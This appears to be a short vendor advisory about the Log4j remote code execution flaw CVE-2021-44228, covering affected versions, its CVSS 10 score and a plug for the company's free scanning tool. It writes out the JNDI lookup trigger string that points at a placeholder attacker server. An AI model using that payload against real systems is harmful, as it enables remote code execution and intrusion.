The Log4j vulnerability, CVE-2021-44228, became public on December 9, 2021.
This easily triggered Log4j vulnerability can be used to gain RCE (remote code execution) on vulnerable systems that use the Apache Log4j logging library. Other Apache products are vulnerable as well, such as Apache Solr.
Log4j is triggered simply by getting the application to log a special string, ${jndi:ldap://<attacker's server>/a}; the flaw affects Apache Log4j versions 2.0-beta9 to 2.15.0-rc, and the library is common in enterprise software and cloud servers across industries. Unless fixed, it gives attackers easy access to internal networks, which can end in theft of valuable data, malware installation, deletion of critical information, and more.
This vulnerability is so critical that it received the rare maximum CVSS score of 10 out of 10.
Fortunately, not everyone is affected, and mitigation can be applied easily, but first it is recommended to check whether you are exposed to Log4j, using Findings' free Log4j VDaaS tool.
For more information, feel free to visit our Log4j information page.